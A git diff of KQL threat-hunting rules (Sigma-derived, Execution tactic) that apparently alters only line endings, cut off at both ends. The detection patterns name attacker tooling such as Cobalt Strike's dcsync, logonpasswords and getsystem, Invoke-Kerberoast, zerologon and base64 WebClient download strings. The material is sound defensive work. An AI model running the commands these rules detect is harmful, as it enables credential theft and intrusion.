"OAGUAVAAuAFcARQBCA" or ProcessCommandLine contains "bgBFAFQALgBXAEUAQg" or ProcessCommandLine contains "4ARQBUAC4AVwBFAEIA" or ProcessCommandLine contains "uAEUAVAAuAFcARQBCA") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Execution/network_connection_initiated_by_eqnedt32_exe.kql b/KQL/rules/Execution/network_connection_initiated_by_eqnedt32_exe.kql index 8ac9c9e2..4ffa0cdd 100644 --- a/KQL/rules/Execution/network_connection_initiated_by_eqnedt32_exe.kql +++ b/KQL/rules/Execution/network_connection_initiated_by_eqnedt32_exe.kql @@ -1,12 +1,12 @@ -// Title: Network Connection Initiated By Eqnedt32.EXE -// Author: Max Altgelt (Nextron Systems) -// Date: 2022-04-14 -// Level: high -// Description: Detects network connections from the Equation Editor process "eqnedt32.exe". -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1203 -// False Positives: -// - Unlikely - -DeviceNetworkEvents +// Title: Network Connection Initiated By Eqnedt32.EXE +// Author: Max Altgelt (Nextron Systems) +// Date: 2022-04-14 +// Level: high +// Description: Detects network connections from the Equation Editor process "eqnedt32.exe". +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1203 +// False Positives: +// - Unlikely + +DeviceNetworkEvents | where InitiatingProcessFolderPath endswith "\\eqnedt32.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/network_connection_initiated_by_regsvr32_exe.kql b/KQL/rules/Execution/network_connection_initiated_by_regsvr32_exe.kql index e211f769..247bc43b 100644 --- a/KQL/rules/Execution/network_connection_initiated_by_regsvr32_exe.kql +++ b/KQL/rules/Execution/network_connection_initiated_by_regsvr32_exe.kql @@ -1,10 +1,10 @@ -// Title: Network Connection Initiated By Regsvr32.EXE -// Author: Dmitriy Lifanov, oscd.community -// Date: 2019-10-25 -// Level: medium -// Description: Detects a network connection initiated by "Regsvr32.exe" -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1559.001, attack.defense-evasion, attack.t1218.010 - -DeviceNetworkEvents +// Title: Network Connection Initiated By Regsvr32.EXE +// Author: Dmitriy Lifanov, oscd.community +// Date: 2019-10-25 +// Level: medium +// Description: Detects a network connection initiated by "Regsvr32.exe" +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1559.001, attack.defense-evasion, attack.t1218.010 + +DeviceNetworkEvents | where InitiatingProcessFolderPath endswith "\\regsvr32.exe" \ No newline at end of file diff --git a/KQL/rules/Execution/new_application_in_appcompat.kql b/KQL/rules/Execution/new_application_in_appcompat.kql index a149633e..f2dc52c1 100644 --- a/KQL/rules/Execution/new_application_in_appcompat.kql +++ b/KQL/rules/Execution/new_application_in_appcompat.kql @@ -1,14 +1,14 @@ -// Title: New Application in AppCompat -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020-05-02 -// Level: informational -// Description: A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204.002 -// False Positives: -// - This rule is to explore new applications on an endpoint. False positives depends on the organization. -// - Newly setup system. -// - Legitimate installation of new application. - -DeviceRegistryEvents +// Title: New Application in AppCompat +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-05-02 +// Level: informational +// Description: A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002 +// False Positives: +// - This rule is to explore new applications on an endpoint. False positives depends on the organization. +// - Newly setup system. +// - Legitimate installation of new application. + +DeviceRegistryEvents | where RegistryKey endswith "\\AppCompatFlags\\Compatibility Assistant\\Store*" \ No newline at end of file diff --git a/KQL/rules/Execution/new_process_created_via_wmic_exe.kql b/KQL/rules/Execution/new_process_created_via_wmic_exe.kql index d3ce7551..44fb1394 100644 --- a/KQL/rules/Execution/new_process_created_via_wmic_exe.kql +++ b/KQL/rules/Execution/new_process_created_via_wmic_exe.kql @@ -1,10 +1,10 @@ -// Title: New Process Created Via Wmic.EXE -// Author: Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community -// Date: 2019-01-16 -// Level: medium -// Description: Detects new process creation using WMIC via the "process call create" flag -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1047, car.2016-03-002 - -DeviceProcessEvents +// Title: New Process Created Via Wmic.EXE +// Author: Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community +// Date: 2019-01-16 +// Level: medium +// Description: Detects new process creation using WMIC via the "process call create" flag +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1047, car.2016-03-002 + +DeviceProcessEvents | where (ProcessCommandLine contains "process" and ProcessCommandLine contains "call" and ProcessCommandLine contains "create") and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/new_virtual_smart_card_created_via_tpmvscmgr_exe.kql b/KQL/rules/Execution/new_virtual_smart_card_created_via_tpmvscmgr_exe.kql index 48a354d5..cdae2f59 100644 --- a/KQL/rules/Execution/new_virtual_smart_card_created_via_tpmvscmgr_exe.kql +++ b/KQL/rules/Execution/new_virtual_smart_card_created_via_tpmvscmgr_exe.kql @@ -1,12 +1,12 @@ -// Title: New Virtual Smart Card Created Via TpmVscMgr.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-06-15 -// Level: medium -// Description: Detects execution of "Tpmvscmgr.exe" to create a new virtual smart card. -// MITRE Tactic: Execution -// Tags: attack.execution -// False Positives: -// - Legitimate usage by an administrator - -DeviceProcessEvents +// Title: New Virtual Smart Card Created Via TpmVscMgr.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-15 +// Level: medium +// Description: Detects execution of "Tpmvscmgr.exe" to create a new virtual smart card. +// MITRE Tactic: Execution +// Tags: attack.execution +// False Positives: +// - Legitimate usage by an administrator + +DeviceProcessEvents | where ProcessCommandLine contains "create" and (FolderPath endswith "\\tpmvscmgr.exe" and ProcessVersionInfoOriginalFileName =~ "TpmVscMgr.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/nodejs_execution_of_javascript_file.kql b/KQL/rules/Execution/nodejs_execution_of_javascript_file.kql index 92d6c71a..589c7d9f 100644 --- a/KQL/rules/Execution/nodejs_execution_of_javascript_file.kql +++ b/KQL/rules/Execution/nodejs_execution_of_javascript_file.kql @@ -1,15 +1,15 @@ -// Title: NodeJS Execution of JavaScript File -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-04-21 -// Level: low -// Description: Detects execution of JavaScript or JSC files using NodeJs binary node.exe, that could be potentially suspicious. -// Node.js is a popular open-source JavaScript runtime that runs code outside browsers and is widely used for both frontend and backend development. -// Adversaries have been observed abusing Node.js to disguise malware as legitimate processes, evade security defenses, and maintain persistence within target systems. -// Because Node.js is commonly used, this rule may generate false positives in some environments. However, if such activity is unusual in your environment, it is highly suspicious and warrants immediate investigation. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.007 -// False Positives: -// - Legitimate use of node.exe to execute JavaScript or JSC files on your environment - -DeviceProcessEvents +// Title: NodeJS Execution of JavaScript File +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-04-21 +// Level: low +// Description: Detects execution of JavaScript or JSC files using NodeJs binary node.exe, that could be potentially suspicious. +// Node.js is a popular open-source JavaScript runtime that runs code outside browsers and is widely used for both frontend and backend development. +// Adversaries have been observed abusing Node.js to disguise malware as legitimate processes, evade security defenses, and maintain persistence within target systems. +// Because Node.js is commonly used, this rule may generate false positives in some environments. However, if such activity is unusual in your environment, it is highly suspicious and warrants immediate investigation. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.007 +// False Positives: +// - Legitimate use of node.exe to execute JavaScript or JSC files on your environment + +DeviceProcessEvents | where ProcessCommandLine contains ".js" and (FolderPath endswith "\\node.exe" or ProcessVersionInfoOriginalFileName =~ "node.exe" or ProcessVersionInfoProductName =~ "Node.js") \ No newline at end of file diff --git a/KQL/rules/Execution/nohup_execution.kql b/KQL/rules/Execution/nohup_execution.kql index a579be68..e2fa1204 100644 --- a/KQL/rules/Execution/nohup_execution.kql +++ b/KQL/rules/Execution/nohup_execution.kql @@ -1,12 +1,12 @@ -// Title: Nohup Execution -// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io -// Date: 2022-06-06 -// Level: medium -// Description: Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.004 -// False Positives: -// - Administrators or installed processes that leverage nohup - -DeviceProcessEvents +// Title: Nohup Execution +// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io +// Date: 2022-06-06 +// Level: medium +// Description: Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.004 +// False Positives: +// - Administrators or installed processes that leverage nohup + +DeviceProcessEvents | where FolderPath endswith "/nohup" \ No newline at end of file diff --git a/KQL/rules/Execution/non_interactive_powershell_process_spawned.kql b/KQL/rules/Execution/non_interactive_powershell_process_spawned.kql index cad06e5b..c25b5fad 100644 --- a/KQL/rules/Execution/non_interactive_powershell_process_spawned.kql +++ b/KQL/rules/Execution/non_interactive_powershell_process_spawned.kql @@ -1,12 +1,12 @@ -// Title: Non Interactive PowerShell Process Spawned -// Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) -// Date: 2019-09-12 -// Level: low -// Description: Detects non-interactive PowerShell activity by looking at the "powershell" process with a non-user GUI process such as "explorer.exe" as a parent. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001 -// False Positives: -// - Likely. Many admin scripts and tools leverage PowerShell in their BAT or VB scripts which may trigger this rule often. It is best to add additional filters or use this to hunt for anomalies - -DeviceProcessEvents +// Title: Non Interactive PowerShell Process Spawned +// Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) +// Date: 2019-09-12 +// Level: low +// Description: Detects non-interactive PowerShell activity by looking at the "powershell" process with a non-user GUI process such as "explorer.exe" as a parent. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001 +// False Positives: +// - Likely. Many admin scripts and tools leverage PowerShell in their BAT or VB scripts which may trigger this rule often. It is best to add additional filters or use this to hunt for anomalies + +DeviceProcessEvents | where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (not(((InitiatingProcessFolderPath endswith ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\CompatTelRunner.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\explorer.exe") or InitiatingProcessFolderPath =~ ":\\$WINDOWS.~BT\\Sources\\SetupHost.exe"))) and (not(((InitiatingProcessFolderPath contains ":\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_" and InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe") or (InitiatingProcessCommandLine contains " --ms-enable-electron-run-as-node " and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe")))) \ No newline at end of file diff --git a/KQL/rules/Execution/office_application_initiated_network_connection_to_non_local_ip.kql b/KQL/rules/Execution/office_application_initiated_network_connection_to_non_local_ip.kql index 899b5c50..be91f7d9 100644 --- a/KQL/rules/Execution/office_application_initiated_network_connection_to_non_local_ip.kql +++ b/KQL/rules/Execution/office_application_initiated_network_connection_to_non_local_ip.kql @@ -1,16 +1,16 @@ -// Title: Office Application Initiated Network Connection To Non-Local IP -// Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems) -// Date: 2021-11-10 -// Level: medium -// Description: Detects an office application (Word, Excel, PowerPoint) that initiate a network connection to a non-private IP addresses. -// This rule aims to detect traffic similar to one seen exploited in CVE-2021-42292. -// This rule will require an initial baseline and tuning that is specific to your organization. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1203 -// False Positives: -// - You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains. -// - Office documents commonly have templates that refer to external addresses, like "sharepoint.ourcompany.com" may have to be tuned. -// - It is highly recommended to baseline your activity and tune out common business use cases. - -DeviceNetworkEvents +// Title: Office Application Initiated Network Connection To Non-Local IP +// Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-11-10 +// Level: medium +// Description: Detects an office application (Word, Excel, PowerPoint) that initiate a network connection to a non-private IP addresses. +// This rule aims to detect traffic similar to one seen exploited in CVE-2021-42292. +// This rule will require an initial baseline and tuning that is specific to your organization. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1203 +// False Positives: +// - You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains. +// - Office documents commonly have templates that refer to external addresses, like "sharepoint.ourcompany.com" may have to be tuned. +// - It is highly recommended to baseline your activity and tune out common business use cases. + +DeviceNetworkEvents | where (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and (not(((RemoteUrl endswith ".deploy.static.akamaitechnologies.com" and RemotePort == 443 and Protocol =~ "tcp") or (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or ((ipv4_is_in_range(RemoteIP, "13.107.4.0/22") or ipv4_is_in_range(RemoteIP, "13.107.6.152/31") or ipv4_is_in_range(RemoteIP, "13.107.18.10/31") or ipv4_is_in_range(RemoteIP, "13.107.42.0/23") or ipv4_is_in_range(RemoteIP, "13.107.128.0/22") or ipv4_is_in_range(RemoteIP, "23.35.224.0/20") or ipv4_is_in_range(RemoteIP, "23.53.40.0/22") or ipv4_is_in_range(RemoteIP, "23.103.160.0/20") or ipv4_is_in_range(RemoteIP, "23.216.76.0/22") or ipv4_is_in_range(RemoteIP, "40.96.0.0/13") or ipv4_is_in_range(RemoteIP, "40.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.96.0.0/14") or ipv4_is_in_range(RemoteIP, "131.253.33.215/32") or ipv4_is_in_range(RemoteIP, "132.245.0.0/16") or ipv4_is_in_range(RemoteIP, "150.171.32.0/22") or ipv4_is_in_range(RemoteIP, "204.79.197.215/32") or ipv4_is_in_range(RemoteIP, "2603:1006::/40") or ipv4_is_in_range(RemoteIP, "2603:1016::/36") or ipv4_is_in_range(RemoteIP, "2603:1026::/36") or ipv4_is_in_range(RemoteIP, "2603:1036::/36") or ipv4_is_in_range(RemoteIP, "2603:1046::/36") or ipv4_is_in_range(RemoteIP, "2603:1056::/36") or ipv4_is_in_range(RemoteIP, "2620:1ec:4::152/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:4::153/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:c::10/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:c::11/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:d::10/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:d::11/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:8f0::/46") or ipv4_is_in_range(RemoteIP, "2620:1ec:900::/46") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::152/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::153/128")) and (RemotePort in~ ("80", "443"))) or ((ipv4_is_in_range(RemoteIP, "13.107.6.152/31") or ipv4_is_in_range(RemoteIP, "13.107.18.10/31") or ipv4_is_in_range(RemoteIP, "13.107.128.0/22") or ipv4_is_in_range(RemoteIP, "23.103.160.0/20") or ipv4_is_in_range(RemoteIP, "40.96.0.0/13") or ipv4_is_in_range(RemoteIP, "40.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.96.0.0/14") or ipv4_is_in_range(RemoteIP, "131.253.33.215/32") or ipv4_is_in_range(RemoteIP, "132.245.0.0/16") or ipv4_is_in_range(RemoteIP, "150.171.32.0/22") or ipv4_is_in_range(RemoteIP, "204.79.197.215/32") or ipv4_is_in_range(RemoteIP, "2603:1006::/40") or ipv4_is_in_range(RemoteIP, "2603:1016::/36") or ipv4_is_in_range(RemoteIP, "2603:1026::/36") or ipv4_is_in_range(RemoteIP, "2603:1036::/36") or ipv4_is_in_range(RemoteIP, "2603:1046::/36") or ipv4_is_in_range(RemoteIP, "2603:1056::/36") or ipv4_is_in_range(RemoteIP, "2620:1ec:4::152/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:4::153/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:c::10/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:c::11/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:d::10/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:d::11/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:8f0::/46") or ipv4_is_in_range(RemoteIP, "2620:1ec:900::/46") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::152/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::153/128")) and (RemotePort in~ ("143", "587", "993", "995")) and Protocol =~ "tcp") or ((ipv4_is_in_range(RemoteIP, "40.92.0.0/15") or ipv4_is_in_range(RemoteIP, "40.107.0.0/16") or ipv4_is_in_range(RemoteIP, "52.100.0.0/14") or ipv4_is_in_range(RemoteIP, "52.238.78.88/32") or ipv4_is_in_range(RemoteIP, "104.47.0.0/17") or ipv4_is_in_range(RemoteIP, "2a01:111:f400::/48") or ipv4_is_in_range(RemoteIP, "2a01:111:f403::/48")) and RemotePort == 443) or ((ipv4_is_in_range(RemoteIP, "40.92.0.0/15") or ipv4_is_in_range(RemoteIP, "40.107.0.0/16") or ipv4_is_in_range(RemoteIP, "52.100.0.0/14") or ipv4_is_in_range(RemoteIP, "52.238.78.88/32") or ipv4_is_in_range(RemoteIP, "104.47.0.0/17") or ipv4_is_in_range(RemoteIP, "2a01:111:f400::/48") or ipv4_is_in_range(RemoteIP, "2a01:111:f403::/48")) and RemotePort == 25) or (ipv4_is_in_range(RemoteIP, "2.16.56.0/23") or ipv4_is_in_range(RemoteIP, "2.17.248.0/21") or ipv4_is_in_range(RemoteIP, "13.107.240.0/21") or ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "23.61.224.0/20") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.72.0.0/13") or ipv4_is_in_range(RemoteIP, "23.3.88.0/22") or ipv4_is_in_range(RemoteIP, "23.216.132.0/22") or ipv4_is_in_range(RemoteIP, "40.76.0.0/14") or ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, "51.142.136.0/22") or ipv4_is_in_range(RemoteIP, "52.160.0.0/11") or ipv4_is_in_range(RemoteIP, "95.101.96.0/21") or ipv4_is_in_range(RemoteIP, "204.79.197.0/24")) or ((ipv4_is_in_range(RemoteIP, "13.107.6.171/32") or ipv4_is_in_range(RemoteIP, "13.107.18.15/32") or ipv4_is_in_range(RemoteIP, "13.107.140.6/32") or ipv4_is_in_range(RemoteIP, "20.64.0.0/10") or ipv4_is_in_range(RemoteIP, "52.108.0.0/14") or ipv4_is_in_range(RemoteIP, "52.244.37.168/32") or ipv4_is_in_range(RemoteIP, "2603:1006:1400::/40") or ipv4_is_in_range(RemoteIP, "2603:1016:2400::/40") or ipv4_is_in_range(RemoteIP, "2603:1026:2400::/40") or ipv4_is_in_range(RemoteIP, "2603:1036:2400::/40") or ipv4_is_in_range(RemoteIP, "2603:1046:1400::/40") or ipv4_is_in_range(RemoteIP, "2603:1056:1400::/40") or ipv4_is_in_range(RemoteIP, "2603:1063:2000::/38") or ipv4_is_in_range(RemoteIP, "2620:1ec:c::15/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:8fc::6/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::171/128") or ipv4_is_in_range(RemoteIP, "2a01:111:f100:2000::a83e:3019/128") or ipv4_is_in_range(RemoteIP, "2a01:111:f100:2002::8975:2d79/128") or ipv4_is_in_range(RemoteIP, "2a01:111:f100:2002::8975:2da8/128") or ipv4_is_in_range(RemoteIP, "2a01:111:f100:7000::6fdd:6cd5/128") or ipv4_is_in_range(RemoteIP, "2a01:111:f100:a004::bfeb:88cf/128")) and (RemotePort in~ ("80", "443")) and Protocol =~ "tcp") or ((ipv4_is_in_range(RemoteIP, "172.128.0.0/10") or ipv4_is_in_range(RemoteIP, "20.20.32.0/19") or ipv4_is_in_range(RemoteIP, "20.103.156.88/32") or ipv4_is_in_range(RemoteIP, "20.190.128.0/18") or ipv4_is_in_range(RemoteIP, "20.231.128.0/19") or ipv4_is_in_range(RemoteIP, "40.126.0.0/18") or ipv4_is_in_range(RemoteIP, "57.150.0.0/15") or ipv4_is_in_range(RemoteIP, "2603:1006:2000::/48") or ipv4_is_in_range(RemoteIP, "2603:1007:200::/48") or ipv4_is_in_range(RemoteIP, "2603:1016:1400::/48") or ipv4_is_in_range(RemoteIP, "2603:1017::/48") or ipv4_is_in_range(RemoteIP, "2603:1026:3000::/48") or ipv4_is_in_range(RemoteIP, "2603:1027:1::/48") or ipv4_is_in_range(RemoteIP, "2603:1036:3000::/48") or ipv4_is_in_range(RemoteIP, "2603:1037:1::/48") or ipv4_is_in_range(RemoteIP, "2603:1046:2000::/48") or ipv4_is_in_range(RemoteIP, "2603:1047:1::/48") or ipv4_is_in_range(RemoteIP, "2603:1056:2000::/48") or ipv4_is_in_range(RemoteIP, "2603:1057:2::/48")) and (RemotePort in~ ("80", "443")) and Protocol =~ "tcp") or ((ipv4_is_in_range(RemoteIP, "13.64.0.0/11") or ipv4_is_in_range(RemoteIP, "13.107.6.192/32") or ipv4_is_in_range(RemoteIP, "13.107.9.192/32") or ipv4_is_in_range(RemoteIP, "13.89.179.14/32") or ipv4_is_in_range(RemoteIP, "20.40.0.0/14") or ipv4_is_in_range(RemoteIP, "20.48.0.0/12") or ipv4_is_in_range(RemoteIP, "20.64.0.0/12") or ipv4_is_in_range(RemoteIP, "52.123.0.0/16") or ipv4_is_in_range(RemoteIP, "52.108.0.0/14") or ipv4_is_in_range(RemoteIP, "52.136.0.0/13") or ipv4_is_in_range(RemoteIP, "57.150.0.0/15") or ipv4_is_in_range(RemoteIP, "80.239.150.67/32") or ipv4_is_in_range(RemoteIP, "2620:1ec:4::192/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::192/128")) and RemotePort == 443 and Protocol =~ "tcp") or ((ipv4_is_in_range(RemoteIP, "13.107.136.0/22") or ipv4_is_in_range(RemoteIP, "40.108.128.0/17") or ipv4_is_in_range(RemoteIP, "52.104.0.0/14") or ipv4_is_in_range(RemoteIP, "104.146.128.0/17") or ipv4_is_in_range(RemoteIP, "150.171.40.0/22") or ipv4_is_in_range(RemoteIP, "2603:1061:1300::/40") or ipv4_is_in_range(RemoteIP, "2620:1ec:8f8::/46") or ipv4_is_in_range(RemoteIP, "2620:1ec:908::/46") or ipv4_is_in_range(RemoteIP, "2a01:111:f402::/48")) and (RemotePort in~ ("80", "443")) and Protocol =~ "tcp")))) \ No newline at end of file diff --git a/KQL/rules/Execution/operator_bloopers_cobalt_strike_commands.kql b/KQL/rules/Execution/operator_bloopers_cobalt_strike_commands.kql index 81433cb7..5405e6ca 100644 --- a/KQL/rules/Execution/operator_bloopers_cobalt_strike_commands.kql +++ b/KQL/rules/Execution/operator_bloopers_cobalt_strike_commands.kql @@ -1,10 +1,10 @@ -// Title: Operator Bloopers Cobalt Strike Commands -// Author: _pete_0, TheDFIRReport -// Date: 2022-05-06 -// Level: high -// Description: Detects use of Cobalt Strike commands accidentally entered in the CMD shell -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.003, stp.1u - -DeviceProcessEvents +// Title: Operator Bloopers Cobalt Strike Commands +// Author: _pete_0, TheDFIRReport +// Date: 2022-05-06 +// Level: high +// Description: Detects use of Cobalt Strike commands accidentally entered in the CMD shell +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.003, stp.1u + +DeviceProcessEvents | where ((ProcessCommandLine contains "psinject" or ProcessCommandLine contains "spawnas" or ProcessCommandLine contains "make_token" or ProcessCommandLine contains "remote-exec" or ProcessCommandLine contains "rev2self" or ProcessCommandLine contains "dcsync" or ProcessCommandLine contains "logonpasswords" or ProcessCommandLine contains "execute-assembly" or ProcessCommandLine contains "getsystem") and (ProcessCommandLine startswith "cmd " or ProcessCommandLine startswith "cmd.exe" or ProcessCommandLine startswith "c:\\windows\\system32\\cmd.exe")) and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/operator_bloopers_cobalt_strike_modules.kql b/KQL/rules/Execution/operator_bloopers_cobalt_strike_modules.kql index 0a14b55a..52be17aa 100644 --- a/KQL/rules/Execution/operator_bloopers_cobalt_strike_modules.kql +++ b/KQL/rules/Execution/operator_bloopers_cobalt_strike_modules.kql @@ -1,10 +1,10 @@ -// Title: Operator Bloopers Cobalt Strike Modules -// Author: _pete_0, TheDFIRReport -// Date: 2022-05-06 -// Level: high -// Description: Detects Cobalt Strike module/commands accidentally entered in CMD shell -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.003 - -DeviceProcessEvents +// Title: Operator Bloopers Cobalt Strike Modules +// Author: _pete_0, TheDFIRReport +// Date: 2022-05-06 +// Level: high +// Description: Detects Cobalt Strike module/commands accidentally entered in CMD shell +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.003 + +DeviceProcessEvents | where (ProcessCommandLine contains "Invoke-UserHunter" or ProcessCommandLine contains "Invoke-ShareFinder" or ProcessCommandLine contains "Invoke-Kerberoast" or ProcessCommandLine contains "Invoke-SMBAutoBrute" or ProcessCommandLine contains "Invoke-Nightmare" or ProcessCommandLine contains "zerologon" or ProcessCommandLine contains "av_query") and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe") \ No newline at end of file diff --git a/KQL/rules/Execution/osacompile_execution_by_potentially_suspicious_applet_osascript.kql b/KQL/rules/Execution/osacompile_execution_by_potentially_suspicious_applet_osascript.kql index 71ff2c4b..1c14712e 100644 --- a/KQL/rules/Execution/osacompile_execution_by_potentially_suspicious_applet_osascript.kql +++ b/KQL/rules/Execution/osacompile_execution_by_potentially_suspicious_applet_osascript.kql @@ -1,10 +1,10 @@ -// Title: Osacompile Execution By Potentially Suspicious Applet/Osascript -// Author: Sohan G (D4rkCiph3r), Red Canary (Idea) -// Date: 2023-04-03 -// Level: medium -// Description: Detects potential suspicious applet or osascript executing "osacompile". -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.002 - -DeviceProcessEvents +// Title: Osacompile Execution By Potentially Suspicious Applet/Osascript +// Author: Sohan G (D4rkCiph3r), Red Canary (Idea) +// Date: 2023-04-03 +// Level: medium +// Description: Detects potential suspicious applet or osascript executing "osacompile". +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.002 + +DeviceProcessEvents | where ProcessCommandLine contains "osacompile" and (InitiatingProcessFolderPath endswith "/applet" or InitiatingProcessFolderPath endswith "/osascript") \ No newline at end of file diff --git a/KQL/rules/Execution/osacompile_run_only_execution.kql b/KQL/rules/Execution/osacompile_run_only_execution.kql index 0f2d1440..1e7dd6f2 100644 --- a/KQL/rules/Execution/osacompile_run_only_execution.kql +++ b/KQL/rules/Execution/osacompile_run_only_execution.kql @@ -1,10 +1,10 @@ -// Title: OSACompile Run-Only Execution -// Author: Sohan G (D4rkCiph3r) -// Date: 2023-01-31 -// Level: high -// Description: Detects potential suspicious run-only executions compiled using OSACompile -// MITRE Tactic: Execution -// Tags: attack.t1059.002, attack.execution - -DeviceProcessEvents +// Title: OSACompile Run-Only Execution +// Author: Sohan G (D4rkCiph3r) +// Date: 2023-01-31 +// Level: high +// Description: Detects potential suspicious run-only executions compiled using OSACompile +// MITRE Tactic: Execution +// Tags: attack.t1059.002, attack.execution + +DeviceProcessEvents | where ProcessCommandLine contains "osacompile" and ProcessCommandLine contains " -x " and ProcessCommandLine contains " -e " \ No newline at end of file diff --git a/KQL/rules/Execution/outbound_network_connection_initiated_by_microsoft_dialer.kql b/KQL/rules/Execution/outbound_network_connection_initiated_by_microsoft_dialer.kql index 80463922..3c5c13f6 100644 --- a/KQL/rules/Execution/outbound_network_connection_initiated_by_microsoft_dialer.kql +++ b/KQL/rules/Execution/outbound_network_connection_initiated_by_microsoft_dialer.kql @@ -1,14 +1,14 @@ -// Title: Outbound Network Connection Initiated By Microsoft Dialer -// Author: CertainlyP -// Date: 2024-04-26 -// Level: high -// Description: Detects outbound network connection initiated by Microsoft Dialer. -// The Microsoft Dialer, also known as Phone 